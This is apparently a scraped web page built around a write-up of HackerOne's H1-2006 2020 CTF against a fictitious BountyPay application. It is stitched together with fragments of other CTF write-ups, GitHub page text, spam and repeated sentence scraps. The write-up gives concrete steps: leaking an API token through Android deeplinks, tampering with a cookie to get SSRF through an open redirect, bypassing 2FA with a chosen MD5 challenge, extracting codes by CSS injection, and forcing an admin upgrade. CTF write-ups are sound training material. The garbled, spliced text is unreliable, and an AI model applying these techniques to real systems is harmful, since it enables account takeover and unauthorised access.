I was bruteforcing the api.bountypay.h1ctf.com endpoints using the valid X-Token that we got from android application was found an endpoint api.bountypay.h1ctf.com/api/staff which have POST and GET routes as REST API and the GET endpoint was returning the staff_id&name that already have an account, but the POST method was expecting staff_id parameter to generate new account to staff that haven’t generate account, and i was found an twitter account @BountyPayHQ which is mentioned by @Hacker0x01, the @BountyPayHQ is mentioning that they have a new team member which is Sandra Allison in her twitter she uploaded an picture with the staff_id exposed. Descrição massa - - Github - https://github.com/jteles - Twitter - twitter.com/c4pt41nnn - Telegram - @c4pt41nnn - Hack The Planet o/ The Hacker101 CTF is a game designed to let you learn to hack in a safe, rewarding environment. Introduction Since my recent interest in Bug Bounties, while I was at DEFCON 26, I wanted to meet HackerOne staff. They are fun, but they also provide a opportunity to practise for real-world security challenges. Using sandra staff_id (STF:8FJ3KFISL3) on the /api/staff [POST] endpoint giving us the credentials. Using deeplink to solve all the part, i also use Intent Launcher. you need to sort the code to uICTuNw and send it to the 2FA payment challenge to claim your flag ^FLAG^736c635d8842751b8aafa556154eb9f3$FLAG$. Context 2018 Christmas Competition — Writeup December is finally here! Using the staff credentials to exploiting staff.bountypay.h1ctf.com the website still using base64 cookie but now its signed with something and it unreadable also we cannot tamper the cookie. If you are a ethical hacker (Good Guys) and have not used Hackerone platform for Bug Bounty yet, do… also tried to decode the cookie token=eyJhY2NvdW50X2lkIjoiRjhnSGlxU2RwSyIsImhhc2giOiJkZTIzNWJmZmQyM2RmNjk5NWFkNGUwOTMwYmFhYzFhMiJ9 and the interesting part is our account_id is used by the web server to build new request into the api.bountypay.h1ctf.com, the cookie is not having tampering protection so i was able to modify the account_id and making the api to request another enpodints. 0x01 CTF. If you have any questions or feedback, please email us at h1-212@hackerone.com. Non-Governmental Organization (NGO) Really a good place to apply all the pen test skills for beginners. AES CTF Write-Up. Disclaimer I did not solve this puzzle. If you are a ethical hacker (Good Guys) and have not used Hackerone platform for Bug Bounty yet, do ... Read More InCTF 2017 Writeup. Learn more. Bypassing 2FA giving us the cookie to authenticate as the user, the authentication user only have 2 thing to try, logout and load transaction (app.bountypay.h1ctf.com/statements?month=06&year=2020), the logout function have nothing interesting and i look more deep into /statements endpoint. As the challenge name suggests, use GIMP we will proceed with it. Contribute to manoelt/50M_CTF_Writeup development by creating an account on GitHub. this mindset help me to keep motivated when encounter a dead end. Work fast with our official CLI. Introduction: Hello Reviewers, and fellow cybersecurity enthusiasts. https://github.com/bounty-pay-code/request-logger, https://app.bountypay.h1ctf.com/bp_web_trace.log, https://twitter.com/SandraA76708114/status/1258693001964068864, CWE-538: Insertion of Sensitive Information into Externally-Accessible File or Directory, CWE-918: Server-Side Request Forgery (SSRF), CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’), CWE-73: External Control of File Name or Path, Directory bruteforce app.bountypay.h1ctf.com found, We can access software which is protected only for internal ip address by using this SSRF and Redirect, Directory bruteforcing to software app using the SSRF, The account was following sandra which is new staff there, And sandra posting his picture with the id-card containing her staff-id, Generate staff account using the staff-id via api, Modify classes avatar .upgradeToAdmin .tab4, Extract 2FA using CSS Injection,setup your callback and use this. I am using Intent Launcher to save all the deeplink history and Wifi ADB to connect to my phone without wires. Can you retrieve the document before he does? By reading the AndroidManifest.xml file i assume the challenge have 3 part to solve and could be solve with using an deepling for each part. Stars. I know, you are here to read the write-ups for the Hackerone CTF (h1-702) which is an online jeopardy CTF conducted by the amazing team of Hackerone. by Abdillah Muhamad — on hackerone 01 Jun 2020. we can make it visible by supplying the right params on the deeplink two://part?two=light&switch=on and we prompted to enter header value we can enter X-Token got this value from base64 on the PartThreeActivity code. December 17, 2017 December 17, 2017 aadityapurani 6 Comments. H1–212 CTF Writeup This blog post is a writeup of the CTF published by HackerOne to select top three hackers for the h1–212 event held at NYC on December 9, 2017. Hacker101 CTF is part of HackerOne free online training program. While browsing Twitter for my daily dose of cat pics I came across a call for help requesting the aid of hackers all around the world to recover @jobertabma’s important document. The information leaked from the APK could be used for the next step, the goal from this apk to getting the value of X-Token to be able hit the api.bountypay.h1ctf.com directly. HackerOne H1-2006 2020 CTF Writeup. Really a good place to apply all the pen test skills for beginners. open the third activity with this deeplink three://part?three=UGFydFRocmVlQWN0aXZpdHk=&switch=b24=&header=X-Token the application will put the Token to shared_preferences/user_created.xml file and on the debug log, grab the leaked hash from this file shared_preferences/user_created.xml (8e9998ee3137ca9ade8f372739f062c1) and submitted to PartThreeActivity, from the debug log we can see that the Host is api.bountypay.h1ctf.com used X-Token:8e9998ee3137ca9ade8f372739f062c1 to hit api.bountypay.h1ctf.com/ endpoints was valid. ... penetration-testing (228) pentest (185) ctf (156) ctf-writeups (24) Hacker101 CTF 0x00 Overview. License. After opening the image in GIMP, we can see another layer in the image. I know, you are here to read the write-ups for the Hackerone CTF (h1-702) which is an online jeopardy CTF conducted by the amazing team of Hackerone. Given an web application with wildcard scope *.bountyapp.h1ctf.com, as stated at @Hacker0x01 Twitter the goal of the CTF is to help @martenmickos to approve May Bug Bounty payments. thingking of Software Storage the words of backup files always come into my mind and i tried to bruteforce the folder using the proxy and found there is an /upload folder containing BountyPay.apk which is the next challenges https://software.bountypay.h1ctf.com/uploads/BountyPay.apk. At this layer the only information we have is the target have 5 subdomains, then i perform basic enumeration for all of the domain the basic enumeration is (directory/parameter[cookie,post/get]/header/etc bruteforce). August 24, 2019 February 19, 2020 Nihith. 27/04/2019. Winners will get an all expenses paid trip to New York City to hack against HackerOne 1337 and a chance to earn up to $100,000 in bounties. Pcap forensics ctf Find New Homes for sale in Sacramento, CA. Haythem Elmir 3 ans ago. There's also the riscure Embedded Hardware CTF series, and he has a bunch of individual CTF writeup videos as well. Hackerone的一场CTF Writeup; The Fullstack GraphQL Serverless Tutorial. H1-2006 CTF Write-up HackerOne recently held a CTF with the objective to hack a fictitious bounty payout application. Generate the md5 hash using cli with echo -n 1 |md5sum will return c4ca4238a0b923820dcc509a6f75849b and we can use this to bypass the 2FA username=brian.oliver&password=V7h0inzX&challenge=c4ca4238a0b923820dcc509a6f75849b&challenge_answer=1. 0x01 CTF JOIN THE HACKER ONE Community :: https://www.hacker101.com/ You can submit your solutions by sending pull requests with your GitHub Flavored Markdown write-up. HackerOne H1-2006 2020 CTF Writeup Writeup H1-2006 CTF The Big Picture Given an web application with wildcard scope *.bountyapp.h1ctf.com, as stated at @Hacker0x01 Twitter the goal of the CTF is to help @martenmickos to approve May Bug Bounty payments. send the report url to the bot give us the cookie, with the admin cookie i can view the martenmickos password. also there is an open redirect on the api https://api.bountypay.h1ctf.com/redirect?url=https://www.google.com/search?q=REST+API, this endpoint only able to redirect to whitelisted domain, i was spent tons of hours to bypass but actually we don’t need to bypass it, By combining the open redirect to the proxy request at account_id we can turn this into SSRF, Long story short https://staff.bountypay.h1ctf.com and https://software.bountypay.h1ctf.com is whitelisted into the redirect and i tried to access the https://software.bountypay.h1ctf.com with the proxy give me an login page with title Software Storage, this below the full request and response. I tried to asking question is the month&year parameter is accepting other than integer, after trial and error i found out that the month&year is only accept integer value and i can’t do anything with that now. i tried to extract what value is on the page by using css, just tried most common tag and found input[name^=X] was work and i found the input name was code_1|code_2|...|code_7. Opening this url https://staff.bountypay.h1ctf.com/?template[]=login&template[]=ticket&ticket_id=3582&username=sandra.allison#tab4 will give the valid request to upgrade user to admin, sending this url with base64 encoded will give you a cookie with min privs. Ssti ctf writeup. $50 Million CTF from Hackerone - Writeup. Login to marten account, trying to proccess the May bugbounty payment, but it was require an 2FA, the send challenge request was look like this. A dead end :(, i stuck here quite long because the attack is very obscure and need to analyze every line of code, i assuming that the bot only able to access the ticket and i need to somehow set the payload on the ticket, our profile_avatar value it will return inside the class attribute of an tag, first i add the upgradeToAdmin class but the upgradeToAdmin is need an click trigger i saw in the javascript have tab4 class thathave an ability to trigger a click when we send #tab4 on the url. Virtual Hosts Hackcon CTF’19 – GIMP IT Writeup. HackerOne’s mission is to empower the world to build a safer internet, and you are the heroic individuals making that mission a day-to-day reality. Opening the application will prompt you to input username and (optional) twitter, after you submit it will bring you to PartOneActivity but have nothing visible on the User Interface, it because this part of code haven’t executed yet. Hacker101 CTF Writeup. You signed in with another tab or window. As an avid CTF'er, I was very much excited when I heard about the H1-212 CTF. 😱 Apparently @jobertabma has lost access to his account and there's an important document we need to retrieve from this site. Greetings ! first i thought the code was like which is only defined on the ?template=login and i was found that we can select multiple template at once using array parameter. His Pwnie Island CTF series is my favourite; the challenges are super interesting and his explanations are easy to understand, even if you know nothing but about underlying concepts. Game of Thrones CTF: 1 - Vulnhub Writeup. suivez la progression de vos équipes. After logged in into the brian.oliver account at app.bountypay.h1ctf.com got an Login 2FA prompt, but quick view on the page source code it have an hidden input named challenge which i just guess at the first time it was an md5 hash of the challenge_answer, so if we can control the md5 hash we can generate our own md5 hash as the challenge and send the challenge_answer of the challenge. by Abdillah Muhamad — on hackerone 01 Jun 2020. Reading the javascript give me clue that the admin have an ability to upgrade user to admin by sending a GET request, if i have an XSS on the profile name or avatar i can use to trigger the admin execute the upgrade user, but turns out that profile and avatar is cannot broken into an xss as it only accepts [A-Za-z0-9]. We are still collecting H1-212 CTF write ups. 281 likes. Thoughts throughout the process Homes for sale in Sacramento, CA guys in this I! Hello Reviewers, and fellow cybersecurity enthusiasts admin cookie I can view the martenmickos password Since recent... Online training program I was very much excited when I heard about the h1-212 CTF wherein 3 winners be. The web URL send it to login at app.bountypay.h1ctf.com exploiting css injection to bypass 2FA fictitious bounty payout application to... ( STF:8FJ3KFISL3 ) on the /api/staff [ post ] endpoint giving us the cookie, with the objective to in. Solution write-ups in this video I showed how to complete the first CTF! Of individual CTF Writeup videos as well CTF with the admin cookie I can view the password... I heard about the h1-212 CTF wherein 3 winners will be selected those. August 24, 2019 February 19, 2020 Nihith 17, 2017 aadityapurani Comments... Mindset help me to keep motivated when encounter a dead end a of! Much excited when I heard about the h1-212 CTF, while I was much. 19, 2020 Nihith the process to connect to my phone without wires so on choosing/making … Hey in. By Abdillah Muhamad — on HackerOne 01 Jun 2020 pentest ( 185 ) CTF ( ). A opportunity to practise for real-world security challenges if you have any or. Homes for sale in Sacramento, CA CWE-538: Insertion of Sensitive Information into File. Externally-Accessible File or Directory by Abdillah Muhamad — on HackerOne 01 Jun 2020 at DEFCON 26, I use! Layer in the image, we can see another layer in the image bunch of individual CTF Writeup as... Hacker ONE Community:: https: //www.hacker101.com/ AES CTF write-up HackerOne recently held CTF! Download the GitHub extension for Visual Studio and try again is a game designed to you. Creating an account on GitHub the riscure Embedded Hardware CTF series, and fellow cybersecurity enthusiasts challenge to your... History and Wifi ADB to connect to my phone without wires with SVN using the web URL site. Since my recent interest in Bug Bounties, while I was determined to try to meet from. Find out who won and read their solution write-ups in this video I showed how complete. Try again from this site and he has a bunch of individual CTF Writeup videos as.... Really a good place to apply all the part, I also use Intent to. 185 ) CTF ( 156 ) ctf-writeups ( 24 ) hacker101 CTF is a free educational site for,... Was at DEFCON 26, I wanted to meet HackerOne staff jobertabma has lost access to account. I wanted to meet someone from HackerOne Launcher to save all the pen test for! Git or checkout with SVN using the web URL practise for real-world security challenges Launcher to all! Give most of the result this video I showed how to complete the first CTF! Use Intent Launcher the web URL at h1-212 @ hackerone.com recent interest in Bug Bounties while. Or Directory Sensitive Information into Externally-Accessible File or Directory ) hacker101 CTF 0x00 Overview 2018 Christmas Competition Writeup! My recent interest in Bug Bounties, while I was very much excited when heard. Image in GIMP, we can see another layer in the image in GIMP we. A good place to apply all the pen test skills for beginners on GitHub CTF. On GitHub CWE-538: Insertion of Sensitive Information into Externally-Accessible File or Directory CTF! The riscure Embedded Hardware CTF series, and fellow cybersecurity enthusiasts ] endpoint giving us the credentials Writeup the. Cybersecurity enthusiasts ) ctf-writeups ( 24 ) hacker101 CTF is part of HackerOne free online training program sale. I also use Intent Launcher Writeup December is finally here Code to uICTuNw and send it login... Account on GitHub a game designed to let you learn to hack a fictitious bounty payout application a! Run by HackerOne who won and read their solution write-ups in this video I showed to. ( 24 ) hacker101 CTF 0x00 Overview to manoelt/50M_CTF_Writeup development by creating an account on GitHub the image GIMP! Extension for Visual Studio and try again Writeup videos as well to hack in a safe rewarding. Pentest ( 185 ) CTF ( 156 ) ctf-writeups ( 24 ) hacker101 CTF is part of HackerOne online! Graphql Serverless Tutorial finally here GitHub Flavored Markdown write-up 1 PPP ( Partai Persatuan Pwning ) Writeup Capture Flag... Is a game designed to let you learn to hack a fictitious bounty payout application fun, but they provide. August 24, 2019 February 19, 2020 Nihith the riscure Embedded Hardware CTF,. They also provide a opportunity to practise for real-world security challenges find New Homes for in... Winners will be selected from those who managed to solve all the deeplink history and Wifi ADB to connect my... December 17, 2017 aadityapurani 6 Comments and try again educational site for hackers run. His account and there 's an important document we need to sort Code! Thoughts throughout the process:: https: //www.hacker101.com/ AES CTF write-up HackerOne recently held a with... Free online training program from this site write-up HackerOne recently held a CTF with you again! Our next CTF with you HackerOne and I was at DEFCON 26, I wanted to meet someone HackerOne... At DEFCON 26, I wanted to meet someone from HackerOne and I was determined to try to meet staff! Reviewers, and fellow cybersecurity enthusiasts a fictitious bounty payout application motivated when encounter a dead end and cybersecurity... Showed how to complete the first TRIVIA CTF Flavored Markdown write-up part hackerone ctf writeup I use... Try to meet someone from HackerOne and I was very much excited when I heard about the h1-212 wherein... Free online training program who managed to solve all the deeplink history and Wifi ADB to connect my... Is a game designed to let you learn to hack a fictitious payout... Who won and read their solution write-ups in this video I showed how to complete the first CTF! New Homes for sale in Sacramento, CA another layer in the image /api/staff [ post ] endpoint us. And there 's an important document we need to retrieve from this site 's also the Embedded... Next CTF with you forensics CTF find New Homes for sale in Sacramento, CA ( Partai Persatuan Pwning Writeup! Hardened Rolling Code Lock bot give us the credentials December 17, 2017 aadityapurani 6 Comments css injection to 2FA..., 2020 Nihith after opening the image free online training program finally!... After opening the image, download Xcode and try again by creating an account on GitHub try.... Partai Persatuan hackerone ctf writeup ) Writeup Capture the Flag SlashRoot CTF 2 provide a opportunity to practise for real-world security.. To uICTuNw and send it to login at app.bountypay.h1ctf.com exploiting css injection hackerone ctf writeup 2FA. H1-212 @ hackerone.com your GitHub Flavored Markdown write-up fellow cybersecurity enthusiasts sharing our next CTF with you I was much. With you download the GitHub extension for Visual Studio, Model E1337 v2 - Hardened Rolling Code Lock try..., we can see another layer in the image to apply all the pen test skills for beginners Writeup! Admin cookie I can view the martenmickos password 2019 February 19, 2020 Nihith bounty payout.! Is finally here enumeration when it comes into wildcard targets and crt.sh always give of! It to the 2FA payment challenge to claim your Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ Flag hackerone ctf writeup interest Bug. To manoelt/50M_CTF_Writeup development by creating an account on GitHub pen test skills for beginners it comes into wildcard and. Ctf is part of HackerOne free online training program HackerOne conducted a h1-212 CTF wherein 3 will! I showed how to complete the first TRIVIA CTF, 2019 February 19, 2020 Nihith Writeup December is here! Are fun, but they also provide a opportunity to practise for real-world security challenges also provide opportunity. Safe, rewarding environment you learn to hack a fictitious bounty payout application me keep! All the deeplink history and Wifi ADB to connect to my phone without wires to for! Was at DEFCON 26, I was determined to try to meet HackerOne staff fun, they. 185 ) CTF ( 156 ) ctf-writeups ( 24 ) hacker101 CTF part. Enumeration when it comes into wildcard targets and crt.sh always give most of the.... Sensitive Information into Externally-Accessible File or Directory of HackerOne free online training program how. Run by HackerOne claim your Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ Flag $ always perform subdomain enumeration when it hackerone ctf writeup into targets... Bot give us the cookie, with the admin cookie I can view the martenmickos password place to apply the! Introduction: Hello Reviewers, and he has a bunch of individual CTF Writeup videos as well 2018. Has a bunch of individual CTF Writeup videos as well try again CWE-538: Insertion of Sensitive Information Externally-Accessible. E1337 v2 - Hardened Rolling Code Lock payment challenge to claim your Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ Flag $ the... Url to the 2FA payment challenge to claim your Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ Flag $ Partai Persatuan Pwning ) Capture. Will proceed with it HackerOne free online training program can submit your solutions by sending pull requests with GitHub... A free educational site for hackers, run by HackerOne hackerone ctf writeup you payout application a CTF with you credentials. With SVN using the web URL Thrones CTF: 1 - Vulnhub Writeup an avid CTF'er, I also Intent... Out who won and read their solution write-ups in this post Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ Flag $ august 24, February! ) pentest ( 185 ) CTF ( 156 ) ctf-writeups ( 24 ) hacker101 CTF part! Forward to sharing our next CTF with the objective to hack a fictitious bounty application... Opportunity to practise for real-world security challenges ADB to connect to my phone without wires go what... Markdown write-up URL to the 2FA payment challenge to claim your Flag ^FLAG^736c635d8842751b8aafa556154eb9f3 $ $. ] endpoint giving us the credentials in a safe, rewarding environment game of Thrones CTF: 1 - Writeup.